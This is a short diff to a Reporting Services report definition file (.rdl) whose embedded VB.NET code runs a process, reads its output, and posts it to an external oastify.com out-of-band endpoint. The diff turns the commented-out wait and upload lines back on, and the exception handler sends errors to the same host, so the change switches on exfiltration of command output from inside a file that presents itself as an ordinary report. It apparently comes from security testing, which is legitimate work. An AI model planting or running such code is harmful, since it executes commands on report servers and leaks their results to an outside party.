--- a/untitled.rdl
+++ b/untitled.rdl
@@ -57,8 +57,8 @@
         
         Dim output As String = p.StandardOutput.ReadToEnd()
         
-        'p.WaitForExit()
-        'webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
+        p.WaitForExit()
+        webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", output)
       Catch ex As Exception
         webClient.UploadString("http://mka0xcp2xotw6hq3a0nt1owa117svpje.oastify.com/abc/123/", ex.Message)
       End Try
